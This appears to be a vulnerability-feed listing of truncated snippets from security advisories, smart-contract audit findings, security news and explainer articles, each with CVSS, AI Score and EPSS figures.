Summary IBM® Db2® is vulnerable to an information disclosure vulnerability due to the consumed GSKit library. Vulnerability Details ** CVEID: CVE-2023-33850 DESCRIPTION: **IBM GSKit-Crypto could allow a remote attacker to obtain sensitive information, caused by a timing-based side channel in the...
7.5CVSS
7.4AI Score
0.001EPSS
Calls to get_virtual_price() are vulnerable to read-only reentrancy
Lines of code 117 Vulnerability details Impact get_virtual_price() was originally considered to be a manipulation-resistant price - suitable as a price oracle, but it was later found to be vulnerable to a read-only reentrancy attack, where the Curve contract could be put into a...
6.9AI Score
Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft
AmzWord an automated attack chain based on CVE-2022-30190,...
8.1AI Score
christmas-ar.com Improper Access Control vulnerability OBB-3795652
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
7AI Score
What is Recovery Time Objective (RTO)?
Grasping the Technique: The Often Misconstrued 'RTO' Unravelled in the Sphere of Business Resiliency At the heart of organisational durability and a tactical roadmap directing towards reestablishing regular operations post-disruptions, lies the often misrepresented 'Recovery Time Objective' (RTO).....
6.8AI Score
Within the sphere of IT, 'network accessibility' is a term frequently used. Yet, does everyone understand its connotation? Simplistically put, network accessibility alludes to how readily a network or system can be accessed by its users. It quantifies to what extent a system is functioning and...
7.9AI Score
Question: Who said the sentence below? “Privacy is at the heart of everything we do.” Answer: Sundar Pichai, the CEO of Alphabet and its largest subsidiary Google. And if you look at the recent actions Google has announced, you’d be tempted to take his word for it: An initiative to let Chrome...
6.9AI Score
Dominating an imperative role in boosting the so-called 'efficiency quotient' within a networking system is the Quality of Service or QoS. Let's dive in and explore the crucial components that make QoS pivotal. In essence, QoS is a blend of a multitude of methodologies and hi-tech devices,...
7.9AI Score
The dark side of Black Friday: decoding cyberthreats around the year’s biggest shopping season
As the annual Black Friday approaches, the digital landscape experiences an unprecedented surge in e-commerce and online shopping activity. Major sales aside, e-commerce is still a huge market. In 2022, global e-commerce retail revenue was estimated to reach $5.7 trillion worldwide, marking nearly....
7.1AI Score
8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader
The threat actors behind the 8Base ransomware are leveraging a variant of the Phobos ransomware to conduct their financially motivated attacks. The findings come from Cisco Talos, which has recorded an increase in activity carried out by the cybercriminals. "Most of the group's Phobos variants are....
7.6AI Score
Price can be easily inflated/deflated by large depositors in the Market contract
Lines of code https://github.com/code-423n4/2023-11-canto/blob/335930cd53cf9a137504a57f1215be52c6d67cb3/1155tech-contracts/src/bonding_curve/LinearBondingCurve.sol#L21-L22 Vulnerability details Impact An attacker can manipulate/inflate market prices by donating/buying large amounts of tokens which....
7.1AI Score
kernel security, bug fix, and enhancement update
[4.18.0-513.5.1_9.OL8] - Update Oracle Linux certificates (Kevin Lyons) - Disable signing for aarch64 (Ilya Okomin) - Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237] - Update x509.genkey [Orabug: 24817676] - Conflict with...
8.8CVSS
8AI Score
EPSS
Alarm system cyberattack leaves those in need struggling to call for help
An alarm system company that allows those in need to ask for help at the touch of a button has suffered a cyberattack, causing serious disruption. Tunstall Netherlands says the attack left the control room struggling to receive distress calls from clients on Sunday November 12, 2023. Tunstall,...
7.1AI Score
7 common mistakes companies make when creating an incident response plan and how to avoid them
Cisco Talos recently covered the basics of NIS2, a new set of requirements for cybersecurity and security incident disclosures set to take effect next year in the European Union. As part of these new guidelines, organizations with operations in the EU must have up-to-date "incident handling"...
6.9AI Score
What is a Network Management Station (NMS) ?
The Bedrock of the Network Coordination Hub (NCH) Delving into the substantial domain of digital networks, the Network Coordination Hub (NCH) is unveiled as a critical component ensuring fluid network operations. Let us unravel this concept - an NCH signifies a control console employed for...
7.2AI Score
What Is Microservices Architecture
Mastering the Essential Elements of Services-Focused Programming The methodology of programming using tiny, interdependent software units, often simplified to 'Microservices', has seen a marked uptick in usage in recent times. This distinct architectural paradigm shapes an application as a group...
7.9AI Score
FREE Cybersecurity Education Courses
Navigating the nuanced realm of digital defense doesn't need to feel like a herculean task. This section aims to shed light on the intricacies of digital defense and aid you in leveraging freely available Cybersecurity Learning Programs. Deciphering Digital Defense Digital defense, also referred...
7.5AI Score
Urgent: VMware Warns of Unpatched Critical Cloud Director Vulnerability
VMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections. Tracked as CVE-2023-34060 (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an...
9.8CVSS
10AI Score
0.044EPSS
ManageEngine SupportCenter Plus < 11.0 Build 11023
The version of ManageEngine SupportCenter Plus installed on the remote host is prior to 11.0 Build 11023, 11.0 Build 11023, 11.0 Build 11023. It is, therefore, affected by a vulnerability as referenced in the support- center_cve-2022-36412 advisory. In Zoho ManageEngine SupportCenter Plus before...
9.8CVSS
6.9AI Score
0.009EPSS
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0, .NET 7.0 and .NET 8.0 RC2. This advisory also provides guidance on what developers can do.....
9.8CVSS
7.2AI Score
0.001EPSS
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0, .NET 7.0 and .NET 8.0 RC2. This advisory also provides guidance on what developers can do.....
9.8CVSS
6.7AI Score
0.001EPSS
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 6.0, ASP.NET Core 7.0 and, ASP.NET Core 8.0 RC2. This advisory also provides guidance.....
6.2CVSS
6.8AI Score
0.0005EPSS
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 6.0, ASP.NET Core 7.0 and, ASP.NET Core 8.0 RC2. This advisory also provides guidance.....
6.2CVSS
6.3AI Score
0.0005EPSS
CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August. The agency on Monday added five...
9.8CVSS
9.6AI Score
0.965EPSS
The reentrancy vulnerability in NextGenCore can allow an attacker to manipulate minting execution
Lines of code Vulnerability details Impact Function _mintProcessing() has been used in mint() and airDropTokens() and both doesn't follow check-effect-interaction pattern and code updates the values of tokensAirdropPerAddress, tokensMintedAllowlistAddress and tokensMintedPerAddress variables after....
7.3AI Score
DoS (Denial of Service) org.jsoup:jsoup in Jira Software Data Center and Server
This High severity Third-Party Dependency vulnerability was introduced in versions 8.20.0, 9.4.0, 9.5.0, 9.6.0, 9.7.0, 9.8.0, 9.9.0, 9.10.0, and 9.11.0 of Jira Software Data Center and Server. This Third-Party Dependency vulnerability, with a CVSS Score of 7.5 and a CVSS Vector of...
7.5CVSS
6.5AI Score
0.009EPSS
Apigee API Security policies howto
The Genesis of Apigee API Security Guidelines In today's digital epoch, APIs (Application Programming Interfaces) have ascended to be the fundamental infrastructure underpinning software development - furnishing the medium for diverse software systems to interact and exchange data. Yet, with this.....
7.7AI Score
Lines of code Vulnerability details Bug Description The recent implementation update empowers the authority to decrease the totalVotingPower arbitrarily using the decreaseTotalVotingPower() function. This authority-exclusive function allows the reduction of totalVotingPower by a specified amount......
7.3AI Score
The 2023 Qualys Security Conference (QSC) started wrapping up on Thursday, November 9th, with two days of new technology announcements, impactful customer use cases, and thought-provoking talks from a host of engaging speakers, including Rachel Wilson, Managing Director at Morgan Stanley and Frank....
7.3AI Score
What is NIS2, and how can you best prepare for the new cybersecurity requirements in the EU?
NIS2 is a European directive that includes new measures to ensure that organizations operating in the European Union (EU) have a high common level of network and infrastructure security. The "directive" outlines the goals all EU member states must achieve. However, each country will implement it...
7.1AI Score
CBL Mariner 2.0 Security Update: kubernetes (CVE-2020-8554)
The version of kubernetes installed on the remote CBL Mariner 2.0 host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the CVE-2020-8554 advisory. Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and...
6.3CVSS
6.7AI Score
0.002EPSS
12 Cloud Security Issues Risks, Threats and Challenges
Unpacking the Cloud: Appreciating its Importance & Uncovering its Weak Points The cloud has utterly transformed our methods of data storage and retrieval. It has flawlessly woven itself into the fabric of our everyday lives, from a repository for precious memories to a platform that supports...
7.1AI Score
Rocky Linux 8 : firefox (RLSA-2022:8554)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:8554 advisory. Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined...
9.8CVSS
7.2AI Score
0.002EPSS
Rocky Linux 8 : firefox (RLSA-2022:0130)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:0130 advisory. It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5,...
10CVSS
7.9AI Score
0.002EPSS
Rocky Linux 8 : thunderbird (RLSA-2022:0129)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:0129 advisory. It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5,...
10CVSS
7.7AI Score
0.002EPSS
Fedora 39 : firefox (2023-a0ac4fe21c)
The remote Fedora 39 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2023-a0ac4fe21c advisory. A compromised content process could have provided malicious data to FilterNodeD2D1 resulting in an out- of-bounds write, leading to a...
9.8CVSS
7.9AI Score
0.001EPSS
Automatic Conditional Access policies in Microsoft Entra streamline identity protection
Extending our commitment to help customers be secure by default, today we're announcing the auto-rollout of Microsoft Entra Conditional Access policies that will automatically protect tenants based on risk signals, licensing, and usage. We've designed these policies based on our deep knowledge of.....
7.2AI Score
Automatic Conditional Access policies in Microsoft Entra streamline identity protection
Extending our commitment to help customers be secure by default, today we're announcing the auto-rollout of Microsoft Entra Conditional Access policies that will automatically protect tenants based on risk signals, licensing, and usage. We've designed these policies based on our deep knowledge of.....
7.3AI Score
Incident Response Plan: Frameworks and Steps
Gaining Insight: The Imperative for an Electronic Threat Handling Framework As we traverse further into the digital era, the threat of cyber encroachments elevates consistently. This looming risk is a reality for all, from emergent startups to well-established corporations, placing operations in...
7AI Score
Gaming-related cyberthreats in 2023: Minecrafters targeted the most
Introduction and trends The gaming industry continues growing. The Newzoo report for 2023 reveals that two in five — more than three billion — across the globe are gamers, which is 6.3 percent more than last year. Globally, gaming revenue amounts to an estimated US$242.39 billion, with almost half....
6.4AI Score
Rocky Linux 8 : GNOME (RLSA-2020:4451)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2020:4451 advisory. A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7,...
9.8CVSS
9AI Score
0.806EPSS
Amazon Linux 2023 : openssl, openssl-devel, openssl-libs (ALAS2023-2023-406)
It is, therefore, affected by a vulnerability as referenced in the ALAS2023-2023-406 advisory. Issue summary: A bug has been identified in the processing of key and initialisation vector (IV) lengths. This can lead to potential truncation or overruns during the initialisation of some...
7.5CVSS
7.6AI Score
0.001EPSS
Summary IBM® Db2® is vulnerable to an information disclosure vulnerability due to the consumed GSKit library. The fix for this issue was already published in an earlier bulletin. If you have already applied the appropriate Db2 special build or installed GSKit version 8.0.55.31, which contains the.....
7.5CVSS
6AI Score
0.001EPSS
Ibexa ezplatform-kernel download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
6.8AI Score
Ibexa ezplatform-kernel download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
6.9AI Score
Ibexa DXP Download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
Ibexa DXP Download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
Download route allows filename change in eZpublish kernel
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
Download route allows filename change in eZpublish kernel
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
SaaS Security is Now Accessible and Affordable to All
This new product offers SaaS discovery and risk assessment coupled with a free user access review in a unique "freemium" model Securing employees' SaaS usage is becoming increasingly crucial for most cloud-based organizations. While numerous tools are available to address this need, they often...
7AI Score